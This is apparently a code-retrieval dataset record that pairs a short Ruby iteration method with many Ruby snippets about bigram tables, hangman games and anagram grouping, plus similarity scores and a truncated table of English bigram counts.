"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def initialize(word)\n @correct_word_array = word.upcase.split(//)\n @letters_guessed_array = Array.new(word.length,\"__\")\n end",
"def looper(word1, word2)\n\t\tputs word1\n\t\t@word1 = word1.split(\"\") \n\t\t@word2 = word2.split(\"\")\n\n\t\tuntil @word1 == @word2 do \n\n\t\t\t@word1.each_with_index do |let, index|\n\t\t\t\tif let == @word2[index]\n\t\t\t\telse \n\t\t\t\t\ttemp = @word1.clone\n\t\t\t\t\ttemp[index] = @word2[index]\n\t\t\t\t\ttemp = temp.join(\"\")\n\t\t\t\t\tif @dictionary.exists?(temp) \n\t\t\t\t\t\tputs temp\n\t\t\t\t\t\ttemp = temp.split(\"\")\n\t\t\t\t\t\t@word1=temp\n\t\t\t\t\tend\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\tend",
"def fill_word(word_guess)\n\t\tword_guess_arr = @word_guess.scan\n\t\t\n\n\tend",
"def +(other_word)\n CombinedNoun.new([word, other_word])\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses=''\n @wrong_guesses=''\n @word_with_guesses=''\n @check_win_or_lose=''\n for i in 0..word.length-1\n @word_with_guesses[i]='-'\n end\n end",
"def initialize(word)\n @word = word\n @word_array = @word.chars\n @length = @word.length\n @blanks = []\n @guess_num = 0\n @word_array.each do |word|\n @blanks << \"_ \"\n end\n end",
"def add(word1, word2, file=nil)\n key = [word1,word2]\n if @table.key?(key)\n\t @table[key].file!(file) if file\n else\n bigram = Bigram.new(word1, word2)\n @table[key] = bigram\n\t @table[key].file!(file)\n @index[word1] << word2\n end\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n self\n end",
"def initialize(word)\n @word = word\n @guesses = \"\"\n @wrong_guesses = \"\"\n end",
"def initialize(word)\n @word = word\n @guesses = \"\"\n @wrong_guesses = \"\"\n end",
"def +(words_arr)\n @words = @words | words_arr\n\n self\n end",
"def construct(w)\n @word = \"~#{w}\" # Assimilate!\n @length = @word.length - 1 # Do not count the ~.\n @back = Array.new\n @back << 0 \n @back << 0\n s = 0\n (2..@length).each do |i|\n s = step(s,@word[i - 1])\n @back << s\n end\n end",
"def word=(word)\n add_weight :count, :letter, word.length\n add_weight :first, :letter, word[0]\n (word.length - 1).times { |l| add_weight :next, word[l], word[l.succ] }\n add_weight :last, word[-2], word[-1]\n end",
"def setguessword\n\t\t@starting_word.each_index do |index|\n\t\t\t@guessing_word[index]=\"_ \"\n\t\tend\n\t\treturn @guessing_word\n\tend",
"def make_word_array\n @word_array = @word.chars.to_a\n end",
"def initialize()\n @word = get_random_word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def words\n @phrase = @phrase.split(' ')\n end",
"def initialize\n @words = (KEYWORDS + OTHERS).map(&:downcase)\n end",
"def initialize(word = nil, hidden_word = nil)\r\n @word = word.gsub(\"\\n\", \"\").split('') unless word == nil\r\n @hidden_word = hidden_word.split(' ') unless word == nil\r\n @word ||= Hangman::Dictionary.generate_word.gsub(\"\\n\", \"\").split('')\r\n @hidden_word ||= @word.map {|letter| letter = \" _ \"}\r\n end",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def add(word1, word2, file)\n if table.key?([word1, word2])\n bigram = table[[word1,word2]]\n else\n bigram = Bigram.new(word1, word2)\n @table[[word1,word2]] = bigram\n @index[word1][word2] = bigram\n end\n bigram.found_in_file(file)\n end",
"def setsecretword word\r\n\t\t @secretword = word\r\n\t\t templ = createtemplate\r\n\t\t\t\t\tword_templ = templ.gsub(\"[\",\"\").gsub(\"]\",\"\")\r\n\t\t\t\t\ti=0\r\n\t\t\t\t\tsec_word_array=@secretword.chars\r\n\t\t\t\t\twhile i < sec_word_array.length do\r\n\t\t\t\t\t\tif sec_word_array[i] == \" \"\r\n\t\t\t\t\t @resulta[i] = \" \"\r\n\t\t\t\t\t else\r\n\t\t\t\t\t \t@resulta[i] = \"_\"\r\n\t\t\t\t end\r\n\t\t\t\t i+=1\r\n\t\t\t\t end\r\n\t\t end",
"def initialize_grid(word1, word2)\n\tgrid = []\n\n\t# build some top rows and columns with 0 to make things easier\n\tfor i in 0..word2.size + 1\n\t\tgrid << [0] * (word1.size + 1)\n\tend\n\n\tgrid\nend",
"def add_word(word)\n sym = word.to_sym\n wdup = word.dup\n for i in 0...word.length\n wdup[i] = 0\n @steps[wdup] << sym\n wdup[i] = word[i]\n end\n @words[word] = sym # for allow_shorter and each_word\n end",
"def initialize(word)\n @word = word.downcase\n @guesses = ''\n @wrong_guesses = ''\n end",
"def words\n @words_array = @phrase.split(' ')\n end",
"def insertions\n new_words = []\n @words.each do |word|\n @word = word || '' \n (length + 1).times do |i|\n ('a'..'z').each { |c| new_words << \"#{@word[0...i]}#{c}#{@word[i..-1]}\" }\n end\n end\n new_words\n end",
"def set_guess\n @guess = Array.new(@word.length, '*')\n end",
"def initialize(word)\r\n\r\n\t\t@word_array = word.split('')\r\n\t\t@board_array = []\r\n\t\t@guesses = []\r\n\r\n\t\t#Set board\r\n\t\t@word_array.length.times do\r\n\t\t\t@board_array << \"_\"\r\n\t\tend\r\n\r\n\t\t@num_of_guesses = 0\r\n\t\t@is_over = false\r\n\r\n\tend",
"def initialize(word)\n @guesses = ''\n @wrong_guesses = ''\n @word = word.downcase\n end",
"def initialize\n\t\t@word = [\"buffalo\", \"llama\", \"kangaroo\", \"elephant\", \"aardvark\", \"orangutan\", \"hyena\"]\n\t\t@current_state = []\n\t\t@guess_array = []\n\tend",
"def initialize(player_1_word)\n @word_to_guess = player_1_word.split('')\n @number_guesses_left = @word_to_guess.length\n @letters_tried=[]\n end",
"def word=(_arg0); end",
"def initialize(word)\n @word = word.downcase\n @guesses = ''\n @wrong_guesses = ''\n @word_with_guesses = \" \"\n for i in 0...@word.length\n @word_with_guesses[i] = \"-\"\n end\n @check_win_or_lose = :play\n\n end",
"def initialize word, frequency = 1\n\t\t\t@word = word\n\t\t\t@frequency = frequency\n\t\tend",
"def scramble(word)\n\tfor i in 0..100\n\t\tone = rand(word.length-1)\n\t\ttwo = rand(word.length-1)\n\t\tword[one], word[two] = word[two], word[one]\n\tend\nend",
"def add word\n super word.clone\n end",
"def initialize words\n @word_list = words\n end",
"def add_word word #Function shovels individual strings into the dictionary array\n @dictionary << word\n end",
"def combine_anagrams(words)\r\n\r\n h=Hash.new([])\r\n words.map {|w| key=w.downcase.split('').sort.join; h[key]+=[w]}\r\n h.values\r\n \r\nend",
"def initialize(player1, player2, secret_word)\n @player1 = player1\n @player2 = player2\n @secret_word = secret_word\n\t\t# Code: Split the string into characters\n\t\t# Output: array of characters (secret_word_arr) \n @secret_word_arr = secret_word.chars\n \t@word_length = @secret_word_arr.length\n \t@guess_count = 0\n @is_over = false\n # @guess = nil\n @guesses = []\n\tend",
"def setup\n @board = []\n @words = 1\n for i in 0...@phrase.length\n if @phrase[i] == \" \"\n @board << \" \"\n @words += 1\n else\n @board << \"_\"\n end\n end\n @phraseletters = @phrase.length + 1 - words\n @remaining = phraseletters\n @board = @board.join\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n @word_with_guesses = ''\n @wrong_word_with_guesses = ''\n @check_win_or_lose\n i = 0\n while i < @word.length do\n @word_with_guesses << '-'\n i=i+1\n end\n end",
"def initialize(word)\n\t\t@word = word\n\t\t@guesses = word.length\n\t\t@game_over = false\n\t\t@letters = []\n\tend",
"def addword(word)\n if @graph.words[word].nil? then\n @graph.words[word] = {}\n end\n end",
"def add_word(word)\n \n end",
"def combine_anagrams(words)\r\n hash = Hash.new([])\r\n anagrams = []\r\n words.each do |word|\r\n keyword = word.downcase.chars.sort.join\r\n hash[keyword] += [word]\r\n end\r\n hash.each_value do |words|\r\n anagrams += [words]\r\n end\r\n return anagrams\r\nend",
"def blank_word(word)\n @guessword2 = word.gsub(/[a-z]/, '_').split('')\n end",
"def add(word)\n change_wordlist(@words + [ Word.new(word) ] )\n end",
"def given_word(word)\n @guessword = word.to_s.split('')\n end",
"def add_word(word)\r\n \r\n end",
"def initialize(text)\n @words = text.split(\" \")\n @next = 0\n end",
"def create_codeword_matches(words)\n set = Set.new\n\t\twords.each do |word|\n\t\t\tset.add(word) if word.length == @codeword.length \n\t\tend\n set\n\tend",
"def set_game_variables\n\t\tword = @dictionary.random_word\n\t\t@answer_array = word.split('')\n\t\t@blank_word_array = []\n\t\tword.length.times do \n\t\t\t@blank_word_array << \"_\"\n\t\tend\n\t\t@guess_counter = 6\n\t\t@incorrect_array = []\n\tend",
"def initialize(target_word)\n\t\t@target_word = target_word\n\t\t@guess_limit = target_word.length*2\n\t\t@guess_count = 0\n\t\t@is_over = false\n\t\t@win = false\n\t\t@guess_history = []\n\t\t@feedback = []\n\t\ttarget_word.split('').each {|x| @feedback << [x, false]}\n\tend",
"def scramble_words(chars = WordChars)\n\t\tgsub(/(#{chars})(#{chars}+)(?=#{chars})/) { $1 + $2.randomize }\n\tend",
"def combine_anagrams(words) \r\n anagrams = words.inject(Hash.new()) do |r, word|\r\n key = word.downcase.chars.sort.join\r\n r[key] ||=[]\r\n r[key] << word\r\n r\r\n end\r\n anagrams.values\r\nend",
"def initialize(word=WordGuesserGame.get_random_word, guesses = '',wrong_guesses='')\n @word = word\n @guesses = guesses\n @wrong_guesses = wrong_guesses\n end",
"def combine_anagrams(words)\r\n\tswords = Array.new\r\n\tnoDups = Array.new\r\n\tgroupWords = Array.new\r\n\tanagrams = Array.new\r\n\twords.each {|word| swords << word.downcase.chars.sort.join}\r\n\tswords.each{|word| noDups << word unless !noDups.index(word).nil? }\r\n\tnoDups.each do|tword|\r\n\t\t\t\t\t\r\n\t\t\t\t\tgroupWords = Array.new\r\n\t\t\t\t\twords.each {|word| groupWords << word unless word.downcase.chars.sort.join != tword}\r\n\t\t\t\t\tanagrams << groupWords\r\n\t\t\t\tend\r\n\t\t\t\t\r\n\treturn anagrams\r\nend",
"def add_word(word)\n if word.length == 0\n @isend = true\n else\n @childs[word[0]] ||= WordDictionary.new\n @childs[word[0]].add_word(word[1..-1])\n end\n nil\n end",
"def make_array\n @phrase_string.downcase.split(WORD_SPLIT).reject(&:empty?)\n end",
"def initialize(*arguments)\n @word, *@tags = *arguments.flatten\n end",
"def initialize(word)\n # Make the word lowercase\n @word = word.downcase\n @guesses = ''\n @wrong_guesses = ''\n @word_with_guesses = ''\n end",
"def create_index1(word)\n word.chars.sort!.join\n end",
"def build(words)\n words.each do |word|\n self.add(word)\n end\n end",
"def combine_anagrams(words)\n\th = Hash.new{|hash, key| hash[key] = Array.new;}\n\twords.each do |word| h[word.downcase.split(//).sort.join] << word end\n\th.values \nend",
"def add(word)\n end",
"def morph_words\n words = @query.split(/[^a-zA-Z0-9]/)\n morphed_words = words.map{|word| [word,Text::Metaphone.double_metaphone(word)]}\n morphed_words\n end",
"def anagrams\n word.anagram.words.pluck(:text) - [word.text]\n end",
"def initialize( first_range, second_range, word_counter )\n @word_map = Hash.new\n @ignore_database = Array.new\n @word_combinations_database = Array.new\n @word_count = word_counter\n @first_range = first_range\n @second_range = second_range\n end",
"def initialize(word)\n @word=word\n end",
"def initialize(a, b)\n\t\t\t@a_words = []\n\t\t\t@b_words = []\n\t\t\t@differences = []\n\t\t\n\t\t\trun_diff(a, b)\n\t\tend",
"def second_anagram?(word1, word2)\n w1_copy = word1.dup\n w2_copy = word2.dup\n w1_copy.each_char do |ch1|\n w2_copy.each_char do |ch2|\n if ch1 == ch2\n w1_copy[w1_copy.index(ch1)] = \"\"\n w2_copy[w2_copy.index(ch2)] = \"\"\n end\n end\n end\n w1_copy.empty? && w2_copy.empty?\nend",
"def initialize(word = dictionary_word, progress = nil, bad_guesses = [])\n word = word.join(\"\") if word.is_a? Array\n @value = word.upcase.split(\"\")\n progress.nil? ? @progress = word.upcase.gsub(/\\w/,\"_\").split(\"\") : @progress = progress.join(\"\").upcase.split(\"\")\n @bad_guesses = bad_guesses.join(\"\").upcase.split(\"\")\n end",
"def array_word\n p @arrayed_word = @secret_word.split(\"\")\n end",
"def add(word)\n @words[@words.size] = word\n end",
"def build(text)\r\n # parse words and then builds weighted links\r\n arr = []\r\n i = 0\r\n while word = parse_string\r\n arr << word\r\n if i == 0\r\n add_first_word()\r\n else\r\n add_word()\r\n end\r\n i = 0 if trim_space == true\r\n end\r\n \r\n end",
"def word_substituter (tweet=\"some thing need to be shorten, like two too\")\n tweet= tweet.strip\n temp_a = tweet.split(\" \")\n words_can_b_sh = dictionary.keys\n #puts words_can_b_sh\n temp = \"\"\n# puts temp_a\n temp_a.each do |word|\n if words_can_b_sh.include?(word.downcase)\n temp << dictionary[word.downcase]\n else\n temp << word\n end\n temp << \" \"\n end\n temp.strip\nend",
"def add(word, w)\n if word != \"\" \n cur = self\n word.downcase.each_char do |character|\n modified_char = @@vowels.include?(character) ? '*' : character\n cur.kids[modified_char] = SpellingTrie.new if not cur.kids.has_key? modified_char\n cur = cur.kids[modified_char]\n end\n cur.words_here.add(w)\n end\n end",
"def build_chain\n i = distance(@word1, @word2) \n k = 0\n list = Array.new\n dict_list = make_list\n while i > 0\n j = 0 \n while j < dict_list.length\n #get a increasing edit distance from @word1 and a decreasing edit distance from wor2\n if (distance(@word1, dict_list[j]) <= k && distance(@word2, dict_list[j]) <= i)\n list.push dict_list[j]\n end\n j = j + 1\n end\n k = k + 1\n i = i - 1\n end\n list.push(@word2)\n end",
"def replacements\n new_words = []\n @words.each do |word|\n @word = word || '' \n length.times do |i|\n ('a'..'z').each { |c| new_words << \"#{@word[0...i]}#{c}#{@word[i+1..-1]}\" }\n end\n end\n new_words\n end",
"def combine_anagrams_method2(words)\n\ttemp1 = Array.new\n\ttemp1 = words.clone\t# making a deep copy of the input \n\tanagram = Array.new\t\n\ti = 0\n\twhile i < temp1.length\t\t\t\n\t\tcount = 0 # count the number of anagrams of a particular string say \"cars\"\n\t\tfor j in i+1..(temp1.length - 1)\n\t\t\tif temp1[i].downcase.chars.sort.join == temp1[j].downcase.chars.sort.join \n\t\t\t\tcount = count + 1\n\t\t\t\ttemp1[j],temp1[i+count] = temp1[i+count],temp1[j] # get all the anagrams to one place by swapping\n\t\t\tend\n\t\tend\n\t\tanagram.push([temp1[i..i+count]]) # pushing the array of anagrams into anagram array say [\"cars\", \"racs\", \"scar\"]\n\t\ti = i + count + 1\n\tend\n\t# printing each group\n\tfor i in 0..anagram.length-1\n\t\tprint \"anagram[\" + i.to_s + \"]: \" \n\t\tputs anagram[i]\n\tend\t\nend",
"def initialize(word)\n @word = word\n end",
"def initialize(word)\n\t\t@word = word\n\t\t@guesses = word.length\n\t\t# Initialize a instance variable with empty hash.\n\t\t@guessed_words = {}\n\t\t# Initialize the game_end to boolean false \n\t\t@game_end = false\n\t\t# Index is used to replace the dashes with the correct guess.\n\t\t@index = 0\n\t\t# Initialize the hidden word with dashes instead of alphabets.\n\t\t@hidden_word = word.tr(word,\"-\")\n\tend",
"def scramble_words(words)\n first_word = words[0]\n last_word = words[-1]\n alphabetically = words[1, (words.size - 2)].chars.sort\n alphabetically.unshift(first_word).push(last_word).join\nend",
"def combine_anagrams(words=[])\n return [] if words.empty?\n hash = {}\n words.each do |word|\n anagram = word.downcase.split(\"\").sort.join(\"\")\n if hash[anagram].nil? then\n hash[anagram]=[word]\n else\n hash[anagram].push(word)\n end\n end\n return hash.values\nend",
"def scream(word)\n words = words + \"!!!!\"\nend",
"def init_word_board\r\n\t\t if @resulta.size == 0\r\n\t\t\t\t\t\t\treadwordfile(@filename)\r\n\t\t\t\t\t\t\t@descr = @phrases\r\n\t\t\t\t\t\t\tsetsecretword(gensecretword)\r\n\t\t\t\t\t\tend\r\n\t\t end",
"def initialize(word, image)\n @word = word\n @correct_guesses = Array.new(word.game_word.length)\n @dashes = Array.new(word.game_word.length, \"-\")\n @guesses = []\n @counter = 0\n @image = image\n end"
] | [
"0.67964894",
"0.6368523",
"0.63531435",
"0.6240786",
"0.62122756",
"0.61751467",
"0.6128019",
"0.61179775",
"0.61072564",
"0.6092386",
"0.60768235",
"0.60227937",
"0.5985246",
"0.5985246",
"0.5985246",
"0.5985246",
"0.5979332",
"0.5971955",
"0.5959876",
"0.59452933",
"0.5934398",
"0.5934398",
"0.5927344",
"0.5916715",
"0.58955705",
"0.5891825",
"0.5885614",
"0.58798677",
"0.58784336",
"0.58639574",
"0.5831348",
"0.5826584",
"0.5821501",
"0.57875544",
"0.57865864",
"0.5780483",
"0.5768592",
"0.57659537",
"0.5764362",
"0.57483613",
"0.57450145",
"0.5724747",
"0.5724064",
"0.5707146",
"0.57037157",
"0.56901395",
"0.5689935",
"0.56602186",
"0.565793",
"0.5653968",
"0.5647398",
"0.5645645",
"0.5641112",
"0.56395084",
"0.56227106",
"0.56091404",
"0.5598798",
"0.55960727",
"0.55672604",
"0.55671",
"0.5566614",
"0.55631745",
"0.5552575",
"0.55445045",
"0.55442214",
"0.5537941",
"0.5537933",
"0.5525732",
"0.5523491",
"0.5521033",
"0.5504338",
"0.5499134",
"0.5497028",
"0.549191",
"0.5491736",
"0.5486025",
"0.54834795",
"0.5474965",
"0.5467952",
"0.546556",
"0.5454294",
"0.5451002",
"0.5443145",
"0.5442572",
"0.54285896",
"0.54263437",
"0.54240465",
"0.5418156",
"0.54146373",
"0.5411611",
"0.5404517",
"0.5398184",
"0.5392387",
"0.53920835",
"0.5385913",
"0.5380448",
"0.5379579",
"0.53758585",
"0.53735083",
"0.53680694",
"0.53665406"
] | 0.0 | -1 |
Iterate over bigram table. | def each_entry(&b)
@table.each(&b)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def each\n\t\t @table.each do |pair, bigram|\n yield(bigram)\n\t\t end\n\t\t end",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def each\n @table.each do |_, word|\n yield(word)\n end\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def n_gramas\n for i in 2...8\n busca_n_gramas(i)\n end\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def table\n words.scan\n bigrams.scan\n\n list = words.top_weighted(max)\n\n if sort\n list = list.sort_by{ |w| w.to_s }\n end\n\n index = {}\n list.each_with_index do |w, i|\n index[w.spelling] = i\n end\n\n tbl = []\n\n list.each_with_index do |w, i|\n s = ilog(words.weighted_probability(w))\n\n blist = bigrams.matching_bigrams(w.to_s)\n blist = blist.sort_by{ |b| bigrams.score(b) }.reverse\n blist = blist.map{ |b| b.word2 }.uniq\n\n b = []\n blist.each do |w|\n i = index[w]\n b << i+1 if i\n break if b.size == num\n end\n\n # ensure there are at least the required number of bigrams\n until b.size >= num\n b << 0\n end\n\n tbl << [s, w, b]\n end\n\n return tbl\n end",
"def each( &blk )\n @table.each( &blk )\n end",
"def iterator\n @table.iterator\n end",
"def output_table(output=$stdout)\n word_list = words.sort_by{ |w| words.rank(w) }.reverse\n\n word_list = word_list[0, MAX_WORDS]\n\n sets = []\n word_list.each_with_index do |w, i|\n bigram_list = bigrams.matching_bigrams(w.spelling)\n bigram_list = bigram_list.sort_by{ |b| bigrams.rank(b) }.reverse\n bigram_list = bigram_list.map{ |b| b.word2 }.uniq\n bigram_list = bigram_list[0,6] # maximum of six bigrams\n sets << [w.spelling] + bigram_list\n end\n\n sets.each do |w|\n output.puts(w.join(' ')) \n end\n end",
"def each_gram(&block)\n @frequencies.each_key(&block)\n end",
"def each\n while nextperm\n yield indices.map { |i| alphabet[i] }\n end\n end",
"def each &block\n db.iterinit\n loop do\n key = db.iternext or break\n val = db[key]\n yield key, val\n end\n end",
"def to_h\n words = {}\n @table.each do |words, bigram|\n words[words] = bigram.rank\n end\n words\n end",
"def iterator\n return HashTabletIterator.new(@table)\n end",
"def each\n @aln.each do | seq |\n yield seq[@col]\n end\n end",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def each\n @rows.each do |row|\n row.each do |col|\n\tyield col\n end\n end\n end",
"def generate_table\n letters.reverse.each_with_index do |letter, index|\n row = build_row(letter, index)\n table << row\n table.unshift(row) unless index == 0\n end\n end",
"def iterator\n HashTableIterator.new(@table)\n end",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 